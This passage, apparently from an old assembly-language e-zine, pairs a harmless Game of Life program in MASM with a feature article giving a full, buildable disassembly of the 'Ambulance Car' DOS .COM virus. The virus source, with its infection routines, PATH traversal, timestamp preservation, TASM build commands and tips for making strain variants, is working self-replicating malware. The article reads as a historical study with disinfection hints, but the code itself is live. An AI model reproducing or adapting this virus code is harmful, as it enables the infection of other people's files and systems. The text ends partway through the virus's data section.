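    """Model CMP AL,0C0h / SBB AL,AL / INC AX on the low byte only."""
    carry = 1 if al < 0xC0 else 0      # CMP sets CF when AL is below 0C0h
    al = (al - al - carry) & 0xFF      # SBB AL,AL -> 0FFh if CF else 00h
    al = (al + 1) & 0xFF               # INC AX: low byte becomes 00h or 01h
    return al

# Count how many of the 256 possible byte values produce a live cell.
filled = sum(seed_cell(v) for v in range(256))
print(filled, "of 256 byte values give a live cell")
```

Only the values 0C0h..0FFh yield a 1, which is where the 1/4 comes from.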

    Now we do a loop to get the next generation. The screen is 0140h
bytes across and 0C8h bytes down. Therefore the offsets of the 8
neighbours relative to a square are:-

    -0141h -0140h -013Fh

    -0001h    .   +0001h

    +013Fh +0140h +0141h

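    If DI is the offset in the array of the square we are calculating
for, note that the neighbours can be summed as follows (each word access
fetches two adjacent bytes at once, the lower address into AL and the
next one into AH):-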

    MOV AX,[DI-0141h]
    ADD AL,[DI-013Fh]
    ADD AX,[DI+013Fh]
    ADD AL,[DI+0141h]
    ADD AL,[DI-1]
    ADD AL,[DI+1]
    ADD AL,AH

    Note that if bit4 of any of the neighbours was set then we would
still have the correct total in the least significant 4 bits of AL.
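
    To see why the stray bit4's do no harm, here is a Python sketch that
mimics the seven instructions above on a small test array. It is only a
model under my own assumptions (the helper names and the 3-row test array
are made up); every neighbour is given the worst-case value 011h, i.e.
occupied now and also marked for the next generation:

```python
WIDTH = 0x140  # bytes per row, as in the article

def neighbour_nibble(cells, di):
    """Mimic the 7-instruction sum; returns the low 4 bits of AL."""
    def byte(off):
        return cells[di + off]

    def word(off):                       # little-endian 16-bit read
        return byte(off) | (byte(off + 1) << 8)

    ax = word(-0x141)                    # MOV AX,[DI-0141h]
    al, ah = ax & 0xFF, ax >> 8
    al = (al + byte(-0x13F)) & 0xFF      # ADD AL,[DI-013Fh]
    ax = (((ah << 8) | al) + word(0x13F)) & 0xFFFF   # ADD AX,[DI+013Fh]
    al, ah = ax & 0xFF, ax >> 8
    for off in (0x141, -1, 1):           # the three remaining byte ADDs
        al = (al + byte(off)) & 0xFF
    al = (al + ah) & 0xFF                # ADD AL,AH
    return al & 0x0F

cells = bytearray(3 * WIDTH)
di = WIDTH + 5                           # a square in the middle row
for off in (-0x141, -0x140, -0x13F, -1, 1, 0x13F, 0x140, 0x141):
    cells[di + off] = 0x11               # bit0 and bit4 both set
print(neighbour_nibble(cells, di))
```

Even in this worst case AL only reaches 088h, so the bit4 counts stay in
the high nibble and the low nibble still holds the neighbour count.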

    So from here the new cell state can be calculated simply:-

    OR AL,[DI]
    AND AL,0Fh

    CMP AL,3

    If ZF=1 now, the square holds a cell in the next generation:

    JNZ ko
    OR BYTE PTR [DI],010h
ko:


    When the next generation has been calculated we have done most of
the work. The only thing is that if we want to iterate we need all
of those bit4's moved to bit0. We also want to display the next
generation, and this can easily be done at the same time.
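
    The listing does this four squares at a time with SHR EAX,4 followed
by AND EAX,01010101h. A minimal Python sketch of that step (the function
name and the sample bytes are mine, chosen for illustration):

```python
def fixup_dword(eax):
    """SHR EAX,4 then AND EAX,01010101h on four packed cell bytes."""
    return (eax >> 4) & 0x01010101

# Four squares: next-only, current-only, both, neither.
packed = int.from_bytes(bytes([0x10, 0x01, 0x11, 0x00]), "little")
result = fixup_dword(packed).to_bytes(4, "little")
print(list(result))
```

The shift drags the low nibble of each byte into its lower neighbour, but
the mask keeps only bit0 of every byte, which is exactly the old bit4.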

    Note that due to the structure of the code generation#0 is never
displayed. Also we always have blue cells. Despite this it is quite
an entertaining little program to watch....


    The source here is in MASM format but should be trivial to convert
to run on any assembler. It is assembled into a .COM file which means
you should use the /T option on the linker (T=tiny).


===========START OF CODE===================================================

OPTION SEGMENT:USE16
.386

cseg SEGMENT BYTE

ASSUME NOTHING
ORG 0100h

kode PROC NEAR

;
;mode 013h=320x200x256 (0140hx0C8h) and be kind with the stack
;
        MOV SP,0100h

        MOV AX,013h
        INT 010h

;
;use current time as random number seed
;in BP,DX which is used later
;
        MOV AH,02Ch
        INT 021h
        MOV BP,CX
;
;get seg address of 1st seg after code for array store start
;for now ES points there and DS=screen
;
        MOV AX,DS
        ADD AX,01Ah                ;(OFFSET endofprog+0Fh>>4)=(1A)
        MOV ES,AX
        MOV AX,0A000h
        MOV DS,AX

;
;CREATE GENERATION#0
;  this is done by filling approx 1/4 of the cells in the array
;  'randomly', while taking care not to fill any edge cells
;

;
;blank the array
;  this is done to ensure the edge cells are clear
;
        XOR DI,DI
        MOV CX,0FA00h
        REP STOSB

;
;fill the array
;  two nested loops, CL counts the rows, SI counts the columns
;  this is so that after each row DI can be bumped past the edge
;
        MOV CL,0C6h
        MOV DI,0141h            ;array offset we are addressing
;
;BX is 0141h from now until exit, it is used as a constant later
;
        MOV BX,DI

lopr0:    MOV SI,-013Eh

;
;iterate random number seed in BP,DX
;
lopr:    LEA AX,[BP+DI]
        ROR BP,3
        XOR BP,DX
        SUB DX,AX
;
;set cell with probability 1/4
;
        CMP AL,0C0h
        SBB AL,AL
        INC AX
        STOSB
;
;
        INC SI
        JNZ lopr

        SCASW                    ;DI+=2, skipping edge

        LOOP lopr0

;
;now we set DS=array, ES=screen. this doesn't change until exit
;
        PUSH ES
        PUSH DS
        POP ES
        POP DS                    ;DS=vseg,ES=0A000h throughout

;
;'mlop' is the main loop, outputting generations until the user terminates
;
mlop:
;
;CREATE NEXT GENERATION
;
        MOV DI,BX                ;DI=0141h

;
;'lopy' is the loop for rows, a count is not needed because we can get
;the stop point from testing the array offset DI
;

lopy:    MOV SI,013Eh

;
;'lopx' is the loop for columns, SI holds the count
;

;
;get the total number of neighbours into the least significant 4 bits of AL
;
lopx:    MOV AX,[DI-0141h]
        ADD AL,[DI-013Fh]
        ADD AX,[DI+BX-2]
        ADD AL,[DI+BX]
        ADD AL,[DI-1]
        ADD AL,[DI+1]
        ADD AL,AH
;
;calculate new cell state
;
        OR AL,[DI]
        AND AL,0Fh
        CMP AL,3
        JNZ SHORT ko
        OR BYTE PTR [DI],010h

ko:        INC DI

        DEC SI
        JNZ lopx

;
;(each row we miss 2 edge cells)
;
        SCASW
        CMP DI,0FA00h-013Fh
        JC lopy

;
;FIXUP ARRAY AND DISPLAY
; bit4 is copied to bit0 in each byte. all other bits then cleared so
; cells appear as blue pixels, also the iteration loop above assumes
; that bit4 is clear on entry (it only sets it)
;
        MOV CX,03E80h
        XOR DI,DI

lopc:    LODSD
        SHR EAX,4
        AND EAX,01010101h
        MOV [SI-4],EAX
        STOSD
        LOOP lopc

;
;USER KEYPRESS?
;
        MOV AH,0Bh
        INT 021h
        ADD AL,3
;
;no, back for next generation
;
        JP mlop
;
;yes, AL=2 now so make AX=2 to go into text mode
;
        CBW
        INT 010h
;
;back to DOS
;
        MOV AH,04Ch
        INT 021h

kode ENDP

endof EQU $

cseg ENDS

END FAR PTR kode


===========END OF CODE=====================================================
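
    The keypress test near the end of the listing (ADD AL,3 / JP mlop)
relies on the parity flag. INT 021h with AH=0Bh returns AL=00h when no
key is waiting and AL=0FFh when one is. The following Python sketch, which
is not part of the original program, shows how adding 3 separates the two
cases by parity and leaves 2 in AL for the mode set:

```python
def parity_flag(value):
    """x86 PF: set when the low 8 bits of a result hold an even number of 1s."""
    return bin(value & 0xFF).count("1") % 2 == 0

for al in (0x00, 0xFF):                  # AL returned by INT 21h, AH=0Bh
    result = (al + 3) & 0xFF             # ADD AL,3
    action = "JP taken" if parity_flag(result) else "falls through"
    print(hex(al), "->", result, action)
```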


    While the code is optimised for size and for speed you may find that
it runs too quickly. This can be easily remedied by adding a loop that waits
for vertical synchronisation (or vert sync as we techies call it).

    Just add the following after the generation calculating code (that
is after the instruction 'JC lopy'):-

        MOV DX,03DAh

lopv0:    IN AL,DX
        AND AL,8
        JNZ lopv0

lopv1:    IN AL,DX
        AND AL,8
        JZ lopv1

    Also, if you add this the program size changes. 'endofprog' is now
01ABh, so the number of 16-byte paragraphs to add to DS to get the start of
free space is now 01Bh. You must change the instruction at the beginning of
the code:-

        MOV AX,DS
**        ADD AX,01Bh                ;(OFFSET endofprog+0Fh>>4)=(1B) **
        MOV ES,AX
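
    The constant is simply the end offset rounded up to whole 16-byte
paragraphs. A small Python sketch of the arithmetic (the function name is
made up; the first end offset is derived from ORG 0100h plus the 156 bytes
stated earlier, the second is the figure quoted above):

```python
def paragraphs_after(end_offset):
    """Round a byte offset up to whole 16-byte paragraphs."""
    return (end_offset + 0x0F) >> 4

original_end = 0x0100 + 156              # ORG 0100h plus the 156-byte program
print(hex(paragraphs_after(original_end)))   # original listing
print(hex(paragraphs_after(0x01AB)))         # end offset quoted for the vsync version
```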


    One final note: I use SCASW in this code to increment DI by two.
This is a well known space saving trick. However you must be wary since
it does not do just that; it reads the memory at ES:[DI]. Generally this
is fine but if DI=0FFFFh we will get a general protection fault.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    'Ambulance Car' Disassembly
                                                    by Chili


This virus definitely has my favourite payload of all time. I just love
seeing that little ambulance run across the screen with a 'siren' playing at
the same time. Other than that, the virus itself isn't much of a thing. Don't
forget, though, that it dates back to at least 1990.

It is a non-resident .COM infector, and each time an infected file is run it
will attempt to infect two files (be it in the current directory or in a
directory located in the PATH) in a parasitic manner. Infected files will
grow by 796 bytes, the main virus body being appended to the end of
the host. Also the host file's date and time will be preserved. On occasion the
virus will display the 'ambulance car' payload.

The virus doesn't preserve the initial contents of AX and so programs like
HotDIR fail to run when infected. Also if there is any reference to 'PATH' in
the environment block before the actual PATH string the virus will assume that
to be the actual PATH (e.g. 'CLASSPATH=...').


Playing it safe
---------------
At the DOS prompt type "PATH ;" so that the virus will only infect files in the
current directory and you can keep track of things. Also if all you want to do
is see the payload, then comment out the following lines in the source code
(right after the delta offset calculation) so that no files are infected:

                call    search_n_infect
                call    search_n_infect

Moreover you should comment out the lines presented below (for the 'RedXAny'
strain look-alike) so that the payload is shown every time the virus is run.

In case things start to get out of hand, you should do one of three things:
either disinfect the files yourself with a hex editor, use the latest version
of F-PROT (available from ftp.complex.is or through Simtel and Garbo) to scan
and clean the infected files, or use my own disinfector (in another article) to
clean this specific strain.

[NOTE: F-PROT will report the strain whose source code is presented as
       Ambulance.796.D]

Keep in mind that this virus is not destructive, so feel free to go ahead and
infect your entire computer (you really shouldn't do this, since accidents can
sometimes happen!).


Strains
-------
A 'RedXAny' strain look-alike can be obtained by commenting out the following
lines (both in the 'payload' procedure):

                jne        exit_payload            ;  (starting  with    the     sixth)

                jnz        exit_payload            ;  don't show payload

[NOTE: This will not give you the actual 'RedXAny' strain, but one that behaves
       in the same manner - always shows the ambulance car]

Other strains exist, but will not be discussed here, as nothing of interest
would be added.


Compatibility
-------------
The virus runs ok in a Win95 DOS box. Also, remember that for the payload to
be appreciated in full, a PC Speaker is required. Bad luck for those of you who
don't have a computer with one...


Here is the disassembly:

--8<---------------------------------------------------------------------------

; Ambulance Car (aka Ambulance, RedX, Red Cross)
; Ambulance-B strain (or so it seems!)
; Disassembly by Chili for APJ #6
; Byte for byte match when assembled with TASM 4.1
; Assemble with:
;        tasm /ml /m2 ambul-b.asm
;        tlink /t ambul-b.obj


PSP_environment_seg        equ        2Ch        ; PSP location of process'    environment
                                        ;  block segment address

BDA_addr                equ        40h        ; BDA (Bios Data Area) segment address

BDA_LPT3_port_addr        equ        0Ch        ; BDA  location of    LPT3 I/O port  base
                                        ;  address
BDA_video_mode            equ        49h        ; BDA location of current video mode
BDA_timer_counter        equ        6Ch        ; BDA location of number of timer ticks
                                        ;  (18.2 per second) since midnight


_TEXT            segment word public 'code'
                assume    cs:_TEXT, ds:_TEXT, es:_TEXT, ss:_TEXT

                org        100h

; Host and virus' main body
;--------------------------
ambulance_car    proc    far

; Jump over host to real beginning of virus

                db        0E9h, 01h, 00h    ; Hardcoded relative near jump

; Host (missing the first 3 bytes)
;
; Dummy host is just 4 bytes so only a 'nop' here

host:
                nop

; Calculate the delta offset
;
; This piece of code will 'fool' some disassemblers and so it will appear as:
;
;        call    $+4
;        add        [bp-7Fh], bx
;        out        dx, al
;        add        ax, [bx+di]
;
; Pretty basic, but could turn out to be somewhat annoying if used all over the
; place (for the person doing the disassembly, that is!)
;
; (because of 'db 01h'; used since the near jump above is also 3 bytes long
;  and that has to be taken into account for the displacement calculation)

real_start:
                call    find_displacement
                db        01h                ; Used to make this add up to 3 bytes
find_displacement:
                pop        si
                sub        si, offset host

; Infect twice then load up the payload

                call    search_n_infect
                call    search_n_infect
                call    payload

; Restore host's original first 3 bytes

                lea        bx, [si+original_3bytes-4]
                mov        di, offset ambulance_car
                mov        al, [bx]
                mov        [di], al        ; Restore 1st byte
                mov        ax, [bx+1]
                mov        [di+1], ax        ; Restore 2nd and 3rd bytes

; Return control to host

                jmp        di

; Move on to next step (be it 'search_n_infect' or 'payload')

next_step:
                retn

ambulance_car    endp


; Search for a file and infect it
;--------------------------------
search_n_infect proc    near

; Search for the file

                call    search

; Found any file?

                mov        al, byte ptr [si+file_mask-4]
                or        al, al                    ; If not,  then move  on to the
                jz        next_step                ;  next step

; Increase 'opened files' counter

                lea        bx, [si+counter-4]
                inc        word ptr [bx]

; Open file in read/write mode (AL - 02h)

                lea        dx, [si+filename-4]        ; Open a File
                mov        ax, 3D02h                ;  [on entry AL     -    Open  mode;
                int        21h                        ;    DS:DX - Pointer to filename
                                                ;    (ASCIIZ string)]
                                                ;  [returns AX - File handle]

; Save file handle

                mov        word ptr [si+file_handle-4], ax

; Read file's first 3 bytes

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, 3                    ; Read    from  File    or    Device,
                lea        dx, [si+first_3bytes-4] ;  Using a Handle
                mov        ah, 3Fh                    ;  [on entry BX -  File handle;
                int        21h                        ;    CX    -  Number  of bytes     to
                                                ;    read;  DS:DX  -     Address of
                                                ;    buffer]

; Check if already infected

                mov        al, byte ptr [si+first_3bytes-4]
                cmp        al, 0E9h                ; Is first byte a near jump?
                jne        infect                    ; If not,  assume  virus  isn't
                                                ;  here, so go ahead and infect

; Move file pointer to real virus start (pointed to by the initial near jump)

                mov        dx, word ptr [si+first_3bytes+1-4]
                mov        bx, word ptr [si+file_handle-4]
                add        dx, 3                    ; Add  3 bytes    to account    for
                                                ;  the near jump
                xor        cx, cx                    ; Move File Pointer (LSEEK)
                mov        ax, 4200h                ;  [on entry BX -  File handle;
                int        21h                        ;    CX:DX -     Offset,  in bytes;
                                                ;    AL     -     Mode  code     ( Move
                                                ;    pointer     CX:DX    bytes  from
                                                ;    beginning of file, AL - 0)]

; Read first 6 bytes from that location

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, 6
                lea        dx, [si+six_bytes-4]
                mov        ah, 3Fh                    ; Read    from  File    or    Device,
                int        21h                        ;  Using a Handle

; Double-check if already infected
;
; Compares the bytes read  with the first part of the  displacement calculation
;  code

                mov        ax, word ptr [si+six_bytes-4]
                mov        bx, word ptr [si+six_bytes+2-4]
                mov        cx, word ptr [si+six_bytes+4-4]
                cmp        ax, word ptr [si+ambulance_car]
                jne        infect
                cmp        bx, word ptr [si+ambulance_car+2]
                jne        infect
                cmp        cx, word ptr [si+ambulance_car+4]
                je        close_file                ; If already infected,    then go
                                                ;  ahead and close the file

infect:

; Reset file pointer to end of file (AL - 2)

                mov        bx, word ptr [si+file_handle-4]
                xor        cx, cx
                xor        dx, dx                    ; Move File Pointer (LSEEK)
                mov        ax, 4202h                ;  [returns DX:AX - New pointer
                int        21h                        ;    location]

; Calculate virus' near jump relative offset

                sub        ax, 3                    ; Account for the near jump
                mov        word ptr [si+relative_offset-4], ax

; Get and save file's date and time (AL - 0)

                mov        bx, word ptr [si+file_handle-4]
                mov        ax, 5700h                ; Get a File's Date and Time
                int        21h                        ;  [on entry BX - File handle]
                push    cx                        ;  [returns     CX     -    Time;  DX -
                push    dx                        ;    Date]

; Write virus body to end of file

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, virus_body - real_start
                lea        dx, [si+ambulance_car]    ; Write to    a File    or    Device,
                mov        ah, 40h                    ;  Using a Handle
                int        21h                        ;  [on entry BX     - File handle;
                                                ;    CX    -  Number  of  bytes to
                                                ;    write;    DS:DX  - Address of
                                                ;    buffer]

; Write host's first 3 bytes to after virus body

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, 3
                lea        dx, [si+first_3bytes-4]
                mov        ah, 40h                    ; Write to    a File    or    Device,
                int        21h                        ;  Using a Handle

; Move file pointer to beginning of file

                mov        bx, word ptr [si+file_handle-4]
                xor        cx, cx
                xor        dx, dx
                mov        ax, 4200h                ; Move File Pointer (LSEEK)
                int        21h

; Write jump-to-virus-body code to beginning of file

                mov        bx, word ptr [si+file_handle-4]
                mov        cx, 3
                lea        dx, [si+jump_code-4]
                mov        ah, 40h                    ; Write to    a File    or    Device,
                int        21h                        ;  Using a Handle

; Reset file's date and time to previous (AL - 1)

                pop        dx
                pop        cx
                mov        bx, word ptr [si+file_handle-4]
                mov        ax, 5701h                ; Set a File's Date and Time
                int        21h                        ;  [on entry BX     - File handle;
                                                ;    CX - Time; DX - Date]

close_file:
                mov        bx, word ptr [si+file_handle-4]
                mov        ah, 3Eh                    ; Close a File Handle
                int        21h                        ;  [on entry BX - File handle]

                retn

search_n_infect endp


; Find a file to infect, in the PATH or in the current directory
;---------------------------------------------------------------
search            proc    near

                mov        ax, ds:PSP_environment_seg
                mov        es, ax

                push    ds
                mov        ax, BDA_addr
                mov        ds, ax
                mov        bp, ds:BDA_timer_counter
                pop        ds

; Where to infect
;
; Probability of  infecting in the    current directory  (none of     the first    two
;  lower bits of BP being set) is 1/4 (25%),  while probability of searching in
;  the PATH for a directory where to infect (one or both of the first two lower
;  bits of BP being set) is 3/4 (75%)

                test    bp, 00000011b            ; Check if we are  to infect in
                jz        check_cur_dir            ;  the current    directory or in
                                                ;  a PATH directory

; Find the PATH string in the environment block
;
; Format of environment block (from Ralf Brown's Interrupt List):
;
; Offset  Size      Description
; ------  ----      -----------
; 00h      N BYTEs first environment variable, ASCIIZ string of form "var=value"
;          N BYTEs second environment variable, ASCIIZ string
;            ...
;          N BYTEs last environment variable, ASCIIZ string of form "var=value"
;            BYTE  00h
;---DOS 3.0+ ---
;            WORD  number of strings following environment (normally 1)
;          N BYTEs ASCIIZ full pathname of program owning this environment
;                  (other strings may follow)

                xor        bx, bx                    ; Point to the first character
check_if_PATH:
                mov        ax, es:[bx]
                cmp        ax, 'AP'
                jne        not_PATH
                cmp        word ptr es:[bx+2], 'HT'
                je        PATH_found
not_PATH:
                inc        bx
                or        ax, ax                    ; Check if both     AH and AL    are
                jnz        check_if_PATH            ;  equal  to zero  (meaning the
                                                ;  standard     environment  block
                                                ;  is over)

; Setup to check in the current directory

check_cur_dir:
                lea        di, [si+file_mask-4]    ; Point to file mask holder
                jmp        short find_file

; Find a directory in the PATH

PATH_found:
                add        bx, 5                    ; Point to after 'PATH='

find_dir:
                lea        di, [si+pathname-4]        ; Point to PATH name holder

get_character:
                mov        al, es:[bx]
                inc        bx
                or        al, al                    ; Are  we  at the  end of  this
                jz        patch_dir                ;  PATH string?

                cmp        al, ';'                    ; Is  this    a  PATH      directory
                je        check_if_this_one        ;  separator?

                mov        [di], al                ; Write this  character     to the
                inc        di                        ;  PATH name holder
                jmp        short get_character

check_if_this_one:
                cmp        byte ptr es:[bx], 0        ; Are  we  at the  end of  this
                je        patch_dir                ;  PATH string?

                shr        bp, 1                    ; Get  rid    of    the     first    two
                shr        bp, 1                    ;  lower  bits,      because  it's
                                                ;  already known that  at least
                                                ;  one of them is set

; Which directory to choose
;
; Probability of  infecting in the found directory    (none of  the first     two
;  lower bits of BP being set) is 1/4 (25%),  while probability of searching in
;  the PATH for another directory where to infect (one or both of the first two
;  lower bits of BP being set) is 3/4 (75%)

                test    bp, 00000011b            ; Check if we are to search for
                jnz        find_dir                ;  files in this directory or
                                                ;  not

patch_dir:
                cmp        byte ptr [di-1], '\'    ; Does    the     directory    already
                je        find_file                ;  have an ending '\'?

                mov        byte ptr [di], '\'        ; If not, then add one
                inc        di

; Find a file to infect

find_file:
                push    ds
                pop        es
                mov        [si+filename_ptr-4], di ; Save current    location within
                                                ;  the pathname/file_mask

                mov        ax, '.*'                ; Set file mask
                stosw
                mov        ax, 'OC'
                stosw
                mov        ax, 'M'
                stosw

                push    es
                mov        ah, 2Fh                    ; Get    Disk  Transfer    Address
                int        21h                        ;  (DTA)
                                                ;  [returns ES:BX -     Address of
                                                ;    current DTA]

                mov        ax, es
                mov        word ptr [si+DTA_seg-4], ax        ; Save DTA segment
                mov        word ptr [si+DTA_off-4], bx        ; Save DTA offset
                pop        es

                lea        dx, [si+new_DTA-4]        ; Setup new DTA

                mov        ah, 1Ah                    ; Set Disk Transfer Address
                int        21h                        ;  [on entry DS:DX - Address of
                                                ;    DTA]

                lea        dx, [si+file_mask-4]    ; Setup     file  mask      (with     or
                                                ;  without a PATH directory)
                xor        cx, cx                    ; Search for normal files only

                mov        ah, 4Eh                    ; Find First Matching File
                int        21h                        ;  [on     entry     CX      -       File
                                                ;    attribute; DS:DX -    pointer
                                                ;    to filespec (ASCIIZ string)

                jnc        file_found                ; File found? (and no errors?)

; If no file found, then clear the file mask

                xor        ax, ax
                mov        word ptr [si+file_mask-4], ax
                jmp        short restore_DTA

; Check if we are to infect this file or find another one
;
; Probability of  keeping the found     file is 1/8 (12.5%)  while probability     of
;  searching for another one is 7/8 (87.5%)

file_found:
                push    ds
                mov        ax, BDA_addr
                mov        ds, ax

                ror        bp, 1
                xor        bp, ds:BDA_timer_counter
                pop        ds

                test    bp, 00000111b
                jz        file_picked                ; Keep this file?
                                                ; If not, then...

                mov        ah, 4Fh                    ; Find Next Matching File
                int        21h

                jnc        file_found                ; File found? (and no errors?)

; Either a file was picked or no more files were found (so keep last one)

file_picked:
                mov        di, [si+filename_ptr-4] ; Point to after path, if any
                lea        bx, [si+f_name-4]

; Copy the file name of the found file to our filename/pathname holder

store_filename:
                mov        al, [bx]
                inc        bx
                stosb
                or        al, al                    ; Is the file name over?
                jnz        store_filename            ; If not,  then copy  the  next
                                                ;  character

restore_DTA:
                mov        bx, word ptr [si+DTA_off-4]        ; Get old DTA offset
                mov        ax, word ptr [si+DTA_seg-4]        ; Get old DTA segment
                push    ds
                mov        ds, ax
                mov        ah, 1Ah                    ; Set Disk Transfer Address
                int        21h
                pop        ds

                retn

search            endp


; Check if payload will be shown or not
;--------------------------------------
payload            proc    near

; Check if payload will be shown
;
; The  payload    will  be shown    only  when the    counter-of-opened-files matches
;  ...x110 (in binary)    which happens at:  6, 14, 22, 30, 38, ... 65534.  Then,
;  when the counter reaches its limit (65535) and goes back to zero, everything
;  starts again. So probability of the payload being shown is 1/8 (12.5%) and
;  of not is 7/8 (87.5%)

                push    es
                mov        ax, word ptr [si+counter-4]
                and        ax, 00000111b
                cmp        ax, 00000110b            ; Show    payload      every      eight
                jne        exit_payload            ;  (starting  with    the     sixth)
                                                ;  time

; Did we already show the payload? (since the computer was (re)booted)

                mov        ax, BDA_addr
                mov        es, ax
                mov        ax, es:BDA_LPT3_port_addr
                or        ax, ax                    ; If the  LPT3 port     is in use,
                jnz        exit_payload            ;  don't show payload

; Mark LPT3 port as in use, so that the payload won't be shown again

                inc        word ptr es:BDA_LPT3_port_addr
                call    show_payload

exit_payload:
                pop        es

                retn

payload            endp


; Setup and show the 'ambulance car' payload
;-------------------------------------------
show_payload    proc    near

; Check video mode
;
; Text mode 3 (80x25) - video buffer address = 0B800h
; Text mode 7 (80x25) - video buffer address = 0B000h

                push    ds
                mov        di, 0B800h
                mov        ax, BDA_addr
                mov        ds, ax
                mov        al, ds:BDA_video_mode
                cmp        al, 7                    ; Check which  video mode we're
                jne        setup_video_n_tune        ;  on,    if not    Monochrome text
                mov        di, 0B000h                ;  mode 7, assume mode 3

setup_video_n_tune:
                mov        es, di
                pop        ds
                mov        bp, 0FFF0h                ; BP = -16: tone counter and
                                                ;  ambulance column offset
                                                ;  (will increment up to 50h)

setup_animation:
                mov        dx, 0                    ; Setup ambulance_data column
                mov        cx, 16                    ; Number of characters that make
                                                ;  up one ambulance_data line

do_ambulance:
                call    show_ambulance            ; Print the ambulance to screen
                inc        dx
                loop    do_ambulance

                call    play_siren                ; Play    a tone    of the    'siren'
                call    wait_tick                ;  and wait for a tick

                inc        bp
                cmp        bp, 50h                    ; Already played the 'ambulance
                jne        setup_animation            ;  siren' tune 12 times?

                call    speaker_off                ; If yes, then turn speaker off
                push    ds
                pop        es

                retn

show_payload    endp


; Turn the PC speaker off
;------------------------
speaker_off        proc    near

; Turn off the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; (see description below)

                in        al, 61h
                and        al, 11111100b    ; Disable timer channel 2 and  'ungate'
                out        61h, al            ;  its output to the speaker

                retn

speaker_off        endp


; Turn on the speaker and play the "ambulance siren" sound
;------------------------------------------------------------
play_siren        proc    near

; Select tone frequency to generate
;
; Tone frequency is selected by means of the 3rd least significant bit of BP:
;
; Bit(s)                        Description
; ------                        -----------
; ... 3 2 1 0
; ... x 0 x x                    Play 1st tone frequency
; ... x 1 x x                    Play 2nd tone frequency
;
; If we consider A to be  the 1st tone and B to be    the 2nd tone then the whole
;  'ambulance siren' tune will be: (AAAABBBB) x 12

                mov        dx, 07D0h        ; 1st tone: PIT divisor 2000 (~597 Hz)
                test    bp, 00000100b    ; Check if we are to play
                jz        speaker_on        ;  the first or the second
                                        ;  tone
                mov        dx, 0BB8h        ; 2nd tone: PIT divisor 3000 (~398 Hz)

; Turn on the speaker
;
; 8255 PPI - Programmable Peripheral Interface
; Port 61h, 8255 Port B output
;
; Bit(s)                        Description
; ------                        -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 1                Timer 2 gate to speaker enable
; . . . . . . 1 .                Speaker data enable
; x x x x x x . .                Other non-concerning fields

speaker_on:
                in        al, 61h
                test    al, 00000011b    ; If speaker is already on, then go and
                jnz        play_tone        ;  play the sound tone
                or        al, 00000011b    ; Else,     enable     timer    channel     2    and
                out        61h, al            ; 'gate' its output to the speaker

; Program the PIT
;
; 8253 PIT - Programmable Interval Timer
; Port 43h, 8253 Mode Control Register
;
; Bit(s)                        Description
; ------                        -----------
; 7 6 5 4 3 2 1 0
; . . . . . . . 0                16-bit binary counter
; . . . . 0 1 1 .                Mode 3, square wave generator
; . . 1 1 . . . .                Read/Write LSB, followed by write of MSB
; 1 0 . . . . . .                Select counter (channel) 2

                mov        al, 10110110b    ; Set 8253 command register
                out        43h, al            ;  for mode 3, channel 2, etc

; Generate a tone from the speaker
;
; 8253 PIT - Programmable Interval Timer
; Port 42h, 8253 Counter 2 Cassette and Speaker Functions

play_tone:
                mov        ax, dx
                out        42h, al            ; Send LSB (Least Significant Byte)
                mov        al, ah
                out        42h, al            ; Send MSB (Most Significant Byte)

                retn

play_siren        endp


; Show the 'ambulance car'
;-------------------------
show_ambulance    proc    near

                push    cx
                push    dx

                lea        bx, [si+ambulance_data-4]
                add        bx, dx            ; Setup which ambulance_data column
                                        ; we're going to print

                add        dx, bp            ; Don't show the ambulance_data columns
                or        dx, dx            ;  which aren't visible yet
                js        ambulance_done

                cmp        dx, 50h            ; Check if the column we're printing is
                jae        ambulance_done    ;  past the screen limit
                                        ; If yes, then don't print it

                mov        di, 3200        ; Point to beginning of screen's 21st
                                        ;  line (row 20: 3200 / 160 bytes per row)

                add        di, dx            ; Point to the column we're supposed to
                add        di, dx            ;  be printing at

                sub        dx, bp            ; Restore to initial column value

                mov        cx, 5            ; Set it up so we're in the first line

decode_character:
                mov        ah, 7            ; Set color attribute to white

; Decode the character
;
; It's really pretty ingenious: each character is encoded so that for each
;  line beyond the first one the character is incremented by one, and for
;  each column beyond the first the same thing happens. Taking that into
;  account, it's not difficult to understand how it all works and how to
;  decode the ambulance_data

                mov        al, [bx]        ; Get the character
                sub        al, 7
                add        al, cl            ; Account for which line we're in
                sub        al, dl            ; Account for which column we're in

                cmp        cx, 5            ; Are we in the first line?
                jne        print_character ; If we are, then...

                mov        ah, 15            ; Set color attribute to high-intensity
                                        ;  white

                test    bp, 00000011b    ; Is this the first tone of an AAAA or
                                        ;  BBBB tune sequence?
                jz        print_character ; If so, then go ahead and print the
                                        ;  'siren' characters

                mov        al, ' '            ; Else, replace them with a ' ' (to
                                        ;  accomplish the visual 'siren' effect)

print_character:
                stosw                    ; Print the character to screen
                add        bx, 16            ; Point to next     ambulance_data line
                add        di, 158            ; Point to next screen line
                loop    decode_character

ambulance_done:
                pop        dx
                pop        cx

                retn

show_ambulance    endp


; Wait for one tick (18.2 per second) to pass
;--------------------------------------------
wait_tick        proc    near

                push    ds
                mov        ax, BDA_addr
                mov        ds, ax
                mov        ax, ds:BDA_timer_counter    ; Get ticks since midnight
check_timer:
                cmp        ax, ds:BDA_timer_counter    ; Check     if     one  tick    has
                je        check_timer                    ;  already passed
                pop        ds

                retn

wait_tick        endp


;--- Data from here below

ambulance_data:
   first_line    db        22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 66h, 87h, 3Bh
                db        2Dh, 2Eh, 2Fh, 30h, 31h
   second_line    db        23h, 0E0h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E6h, 0E7h
                db        0E7h, 0E9h, 0EAh, 0EBh, 30h, 31h, 32h
   third_line    db        24h, 0E0h, 0E1h, 0E2h, 0E3h, 0E8h, 2Ah, 0EAh, 0E7h
                db        0E8h, 0E9h, 2Fh, 30h, 6Dh, 32h, 33h
   fourth_line    db        25h, 0E1h, 0E2h, 0E3h, 0E4h, 0E5h, 0E7h, 0E7h, 0E8h
